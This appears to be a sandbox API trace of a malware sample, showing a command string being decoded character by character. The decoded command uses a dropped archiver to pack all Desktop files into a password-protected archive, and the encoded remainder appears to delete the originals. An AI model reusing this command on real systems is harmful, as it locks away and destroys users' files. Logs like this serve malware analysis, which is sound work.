-pOe}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezigvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfgvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdsh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5evi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.488] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf446v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf416v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fg7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fST78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ48U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R457HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R427HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDE]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZV#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS %(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.489] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%UVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USEUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPRRILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"%USERPROFLOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.490] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*.*\"') do \"%TEMP%\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS 